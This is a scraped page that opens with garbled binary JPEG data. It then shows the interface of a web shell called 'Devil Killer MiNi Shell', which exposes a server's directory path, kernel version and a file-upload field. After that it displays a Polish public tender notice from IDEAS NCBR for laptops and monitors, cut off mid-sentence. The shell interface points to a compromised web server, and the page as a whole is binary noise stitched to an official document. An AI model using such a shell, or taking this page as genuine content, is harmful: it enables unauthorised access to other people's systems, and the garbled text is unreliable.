JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20210913/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20210913/0017845703-N-2021.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> Dostawa sprzętu komputerowego dla IDEAS NCBR sp. z o.o. </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">IDEAS NCBR SP. Z O.O.</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 388065786</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">NOWOGRODZKA 47A</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Warszawa</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">00-695</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">mazowieckie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL911 - Miasto Warszawa</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">izabela.heclik@ideas-ncbr.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://ideas-ncbr.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - osoba prawna, o której mowa w art. 4 pkt 3 ustawy (podmiot prawa publicznego)</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Inna działalność</span> </h3> <p class="mb-0"> sztuczna inteligencja </p> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Dostawa sprzętu komputerowego dla IDEAS NCBR sp. z o.o. </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-4befec48-1470-11ec-b885-f28f91688073</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00178457</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">03</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-09-13</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ideas-ncbr.eb2b.com.pl/ <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">W postępowaniu o udzielenie zamówienia komunikacja między Zamawiającym a Wykonawcami odbywa się drogą elektroniczną przy użyciu: platformy https://ideas-ncbr.eb2b.com.pl/ . Wszelkie informacje o<br/>środkach komunikacji elektronicznej pomiędzy Zamawiającym a Wykonawcą zostały rozpisane w<br/>rozdziale XI SWZ. Strona internetowa prowadzonego postępowania: https://ideas-ncbr.eb2b.com.pl/</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Wszelkie informacje o wymaganiach technicznych i organizacyjnych dot. korespondencji elektronicznej zostały rozpisane w rozdziale XI SWZ. Strona internetowa prowadzonego postępowania: https://ideas-ncbr.eb2b.com.pl/</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">1.IDEAS NCBR sp. z o.o. z siedzibą w Warszawie przy ul. Nowogrodzkiej 47A, 00-6495 Warszawa (dalej „IDEAS-NCBR”) oświadcza, iż jest administratorem danych osobowych w rozumieniu Rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych), zwanego dalej RODO, w odniesieniu do danych osobowych osób fizycznych (przedsiębiorców), osób fizycznych reprezentujących podmiot biorący udział w niniejszym postępowaniu o udzielenie zamówienia oraz osób fizycznych wskazanych przez ten podmiot jako osoby do kontaktu, osoby wskazane w ofercie oraz osoby odpowiedzialne za wykonanie Umowy lub wykonywanie czynności w ramach prowadzonego postępowania i udzielenia Zamówienia. 2.Dane kontaktowe Inspektora Ochrony Danych - kontakt pisemny za pomocą poczty tradycyjnej na adres: IOD IDEAD NCBR Sp. z o.o., 00-695 Warszawa ul. Nowogrodzka 47A, e – mail: iod@ideas-ncbr.pl, 3.Dane osobowe osób, o których mowa w pkt. 1, będą przetwarzane w celu: 3.1.związanym z prowadzonym postępowaniem o udzielenie zamówienia publicznego na podstawie art. 6 ust. 1 lit. c)RODO w związku z ustawą prawo zamówień publicznych w zakresie niezbędnym do wypełnienia obowiązku prawnego, polegający na: a)przeprowadzeniu niniejszego postępowania o udzielenie Zamówienia; b)wyłonieniu wykonawcy oraz udzielenia Zamówienia poprzez zawarcie Umowy; c)realizacji zawartej Umowy; d)przechowywaniu dokumentacji niniejszego postępowania o udzielenie Zamówienia na wypadek kontroli prowadzonej przez uprawnione organy i podmioty; e)przekazaniu dokumentacji niniejszego postępowania o udzielenie Zamówienia do archiwum, a następnie jej zbrakowanie (trwałe usunięcie i zniszczenie).3.2.związanym z zawarciem i realizacją umowy na podstawie art. 6 ust. 1 lit. b) RODO w przypadku, gdy w wyniku prowadzonego postępowania o udzielenie zamówienia publicznego zostanie zawarta Umowa, jedynie w celu i zakresie niezbędnym do przeprowadzenia niniejszego postępowania, udzielenia zamówienia oraz wykonania Umowy – w kategorii dane zwykłe–imię, nazwisko, zajmowane stanowisko i miejsce pracy, numer służbowego telefonu/ faksu, służbowy adres email, a także dane identyfikujące wykonawcę biorącego udział w prowadzonym niniejszym postępowaniu o udzielenie Zamówienia, tj. nazwę wykonawcy, siedzibę i adres wykonawcy, REGON, NIP, PESEL, adres zamieszkania, adres strony internetowej – jeżeli dane te zostały przez wykonawcę przekazane IDEAS-NCBR sp. z o.o. w związku z prowadzonym niniejszym postępowaniem o udzielenie Zamówienia. 3.3.związanym z prawnie uzasadnionym interesie Administratora podstawie art. 6 ust. 1 lit. f) RODO jedynie w celu i zakresie niezbędnym do wykonania zadań związanych z prowadzonym niniejszym postępowaniem o udzielenie Zamówienia i realizacją zawartej Umowy w kategorii dane zwykłe – imię, nazwisko, zajmowane stanowisko i miejsce pracy, numer służbowego telefonu/faksu, służbowy adres email, a także dane identyfikujące wykonawcę biorącego udział w prowadzonym niniejszym postępowaniu o udzielenie Zamówienia, tj. nazwę wykonawcy, siedzibę i adres wykonawcy, REGON, NIP, PESEL, adres zamieszkania, adres strony internetowej – jeżeli dane te zostały przez wykonawcę dobrowolnie podane w formularzu ofertowym składanym wraz z ofertą w prowadzonym niniejszym postępowaniu o udzielenie Zamówienia.4.Dane osobowe przetwarzane w związku z prowadzeniem postępowania o udzielenie zamówienia publicznego będą przetwarzane przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy. Wszelkie dalsze informacje w zakresie RODO zostały rozpisane w rozdz. XXVIII SWZ</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Informacje dotyczące RODO znajdują się w SWZ w rozdziale XXVIII.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">21/WNP-000018</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">2</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część 1: Dostawa sprzętu komputerowego<br/>Przedmiotem zamówienia jest dostawa sprzętu komputerowego do siedziby Zamawiającego przy ul. Nowogrodzkiej 47A w Warszawie. Zamawiający przewiduje w ramach realizacji tej części zamówienia, możliwość skorzystania z prawa opcji. Minimalny zakres jaki zostanie zrealizowany w ramach zamówienia podstawowego to dostawa następującego sprzętu: <br/>1.1.	Komputer przenośny typ 1 – 35 sztuk;<br/>1.2.	Komputer przenośny typ 2 – 3 sztuki;<br/><br/>W ramach prawa opcji Zamawiający przewiduje zwiększenie zamówienia ponad ilość wskazaną <br/>w punktach 1.1. – 1.2.<br/>Wartość sprzętu komputerowego zamawianego przez Zamawiającego w ramach prawa opcji będzie zgodna z cenami jednostkowymi zaproponowani przez Wykonawcę w formularzu ofertowym i nie może sumarycznie przekroczyć maksymalnej kwoty przeznaczonej na realizację zamówienia w ramach cz. 1.<br/>Zamawiający przewiduje możliwość zlecenia Wykonawcy zamówienia w ramach prawa opcji sukcesywnie, w zależności od potrzeb Zamawiającego, w okresie do 180 dni kalendarzowych od zawarcia umowy lub do wyczerpania limitu kwoty, o której mowa powyżej, w zależności, które ze zdarzeń nastąpi wcześniej.<br/>O zamiarze skorzystania z prawa opcji Zamawiający poinformuje Wykonawcę składając zlecenie. Wykonawcy nie przysługuje żadne roszczenie w stosunku do Zamawiającego, w przypadku, gdy Zamawiający z prawa opcji nie skorzysta. Realizacja zamówienia objętego opcją jest wyłącznie uprawnieniem Zamawiającego. <br/>Maksymalna ilość przewidziana do zakupu w ramach prawa opcji:<br/>1.1. Komputer przenośny typ 1 –20 sztuk;<br/>1.2. Komputer przenośny typ 2 – 10 sztuk;<br/>Podane wyżej ilości są ilościami orientacyjnymi. Zamawiający przewiduje możliwość zwiększenia lub zmniejszanie ww. ilości, w ramach maksymalnej kwoty przewidzianej na realizację zamówienia w ramach cz. 1. Każdy sprzęt komputerowy w ramach prawa opcji będzie zgodny z OPZ. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">30213100-6 - Komputery przenośne</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> W ramach prawa opcji Zamawiający przewiduje zwiększenie zamówienia ponad ilość wskazaną<br/>w zamówieniu podstawowym w punktach 1.1. – 1.2 powyżej w opisie przedmiotu zamówienia.<br/>Przy zastosowaniu prawa opcji: Wykonawca dostarczy sprzęt komputerowy w terminie do 30 dni<br/>kalendarzowych od przekazania zlecenia. Zlecenia mogą zostać przekazane Wykonawcy,<br/>sukcesywnie, w zależności od potrzeb Zamawiającego, w okresie do 180 dni kalendarzowych od<br/>zawarcia umowy lub do wyczerpania limitu kwoty przewidzianej na opcję, w zależności, które ze<br/>zdarzeń nastąpi wcześniej.<br/>Wartość sprzętu komputerowego zamawianego przez Zamawiającego w ramach prawa opcji<br/>będzie zgodna z cenami jednostkowymi zaproponowani przez Wykonawcę w formularzu<br/>ofertowym i nie może sumarycznie przekroczyć maksymalnej kwoty przeznaczonej na realizację zamówienia.<br/>Zamawiający przewiduje możliwość zlecenia Wykonawcy zamówienia w ramach prawa opcji<br/>sukcesywnie, w zależności od potrzeb Zamawiającego, w okresie do 180 dni kalendarzowych od<br/>zawarcia umowy lub do wyczerpania limitu kwoty, o której mowa powyżej, w zależności, które ze<br/>zdarzeń nastąpi wcześniej.<br/>O zamiarze skorzystania z prawa opcji Zamawiający poinformuje Wykonawcę składając<br/>zlecenie. Wykonawcy nie przysługuje żadne roszczenie w stosunku do Zamawiającego, w<br/>przypadku, gdy Zamawiający z prawa opcji nie skorzysta. Realizacja zamówienia objętego opcją<br/>jest wyłącznie uprawnieniem Zamawiającego.<br/>Maksymalna ilość przewidziana do zakupu w ramach prawa opcji:<br/>1.1. Komputer przenośny typ 1 –20 sztuk;<br/>1.2. Komputer przenośny typ 2 – 10 sztuk;<br/>Podane wyżej ilości są ilościami orientacyjnymi. Zamawiający przewiduje możliwość<br/>zwiększenia lub zmniejszanie ww. ilości, w ramach maksymalnej kwoty przewidzianej na realizację zamówienia. Każdy sprzęt komputerowy w ramach prawa opcji będzie zgodny z OPZ. <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">30 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Ocenie będą podlegać wyłącznie oferty niepodlegające odrzuceniu.<br/>2. Ocena będzie dokonywana według ww. skali punktowej, a wynik oceny zostanie obliczony<br/>w następujący sposób:<br/>S = C + G <br/>gdzie:<br/>S – wynik oceny (suma punktów)<br/>C – liczba punktów uzyskanych w kryterium „Cena oferty brutto”<br/>G – liczba punktów uzyskanych w kryterium „Przedłużenie serwisu gwarancyjnego producenta”</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">80</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Przedłużenie serwisu gwarancyjnego producenta</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część 2: Dostawa monitorów <br/>Przedmiotem zamówienia jest dostawa następujących monitorów do siedziby IDEAS NCBR sp. z o.o. przy ul. Nowogrodzkiej 47A w Warszawie: <br/>2.1.	Monitor typ 1 - 10 sztuk <br/>2.2.	Monitor typ 2 - 3 sztuki </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">30231300-0 - Monitory ekranowe</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">30 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Ocenie będą podlegać wyłącznie oferty niepodlegające odrzuceniu.<br/>2. Ocena będzie dokonywana według ww. skali punktowej, a wynik oceny zostanie obliczony w<br/>następujący sposób:<br/>S = C + G <br/>gdzie:<br/>S – wynik oceny (suma punktów)<br/>C – liczba punktów uzyskanych w kryterium „Cena oferty brutto”<br/>G – liczba punktów uzyskanych w kryterium „Przedłużenie serwisu gwarancyjnego producenta”</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">80</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Przedłużenie serwisu gwarancyjnego producenta</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1.O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki dotyczące:<br/>1) zdolności do występowania w obrocie gospodarczym:<br/>Zamawiający nie określa warunku w powyższym zakresie;<br/>2) uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika<br/>to z odrębnych przepisów;<br/>Zamawiający nie określa warunku w powyższym zakresie;<br/>3) sytuacji ekonomicznej lub finansowej:<br/>Zamawiający nie określa warunku w powyższym zakresie;<br/>4) zdolności technicznej lub zawodowej tj.:<br/>4.1. Dot. Części 1 :<br/>Wykonawcy spełnią warunek, jeżeli wykażą, że wykonują lub wykonali w okresie ostatnich trzech<br/>lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy -<br/>w tym okresie, co najmniej: dwa zamówienia polegające na dostawie sprzętu komputerowego o<br/>wartości nie mniejszej niż 100 000,00 zł brutto - każda z dostaw oraz załączą dokumenty<br/>potwierdzające, że dostawy te zostały wykonane lub są wykonywane należycie.<br/>W przypadku, gdy wartość zamówienia jest określona w innej walucie niż w złotych polskich,<br/>Zamawiający dokona przeliczenia tej wartości na złote polskie - na podstawie średniego kursu<br/>złotego w stosunku do waluty obcej, określonej w Tabeli Kursów Narodowego Banku Polskiego<br/>na dzień publikacji Ogłoszenia o zamówieniu. Jeżeli w tym dniu nie będzie opublikowany średni<br/>kurs NBP, Zamawiający przyjmie średni kurs z ostatniego dnia przed dniem publikacji.<br/>W przypadku umów trwających, niezakończonych na dzień składania ofert, wykazana przez<br/>Wykonawcę dostawa, na dzień składania ofert musi być zrealizowana na kwotę nie mniejszą niż<br/>100 000,00 brutto oraz jej wykonany zakres musi obejmować co najmniej zakres określony w<br/>Rozdziale XIX ust. 2 pkt. 4.1. SWZ.<br/>Dot. Części 2 :<br/>Zamawiający nie określa warunku w powyższym zakresie. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">W celu potwierdzenia spełniania przez Wykonawcę warunków udziału w<br/>postępowaniu dotyczących zdolności technicznej lub zawodowej, Zamawiający żąda, w zależności od<br/>charakteru, znaczenia, przeznaczenia lub zakresu dostaw, następujących podmiotowych środków<br/>dowodowych:<br/>1) dokumentów dotyczących podmiotu udostępniającego zasoby, w celu wykazania braku istnienia<br/>wobec niego podstaw wykluczenia oraz spełnienia warunków udziału w postępowaniu, w zakresie, w<br/>jakim Wykonawca powołuje się na jego zasoby – jeżeli Wykonawca polega na zasobach podmiotu<br/>trzeciego;<br/>2) wykazu dostaw wykonanych, a w przypadku świadczeń powtarzających się lub ciągłych również<br/>wykonywanych, w okresie ostatnich 3 lat, a jeżeli okres prowadzenia działalności jest krótszy – w tym<br/>okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których<br/>dostawy zostały wykonane lub są wykonywane, oraz załączeniem dowodów określających, czy te<br/>dostawy zostały wykonane lub są wykonywane należycie, przy czym dowodami, o których mowa, są<br/>referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego dostawy zostały wykonane, a w przypadku świadczeń powtarzających się lub ciągłych są wykonywane, a jeżeli<br/>wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów –<br/>oświadczenie wykonawcy; w przypadku świadczeń powtarzających się lub ciągłych nadal<br/>wykonywanych referencje bądź inne dokumenty potwierdzające ich należyte wykonywanie powinny być<br/>wystawione w okresie ostatnich 3 miesięcy. Wzór stanowi Załącznik nr 7 do 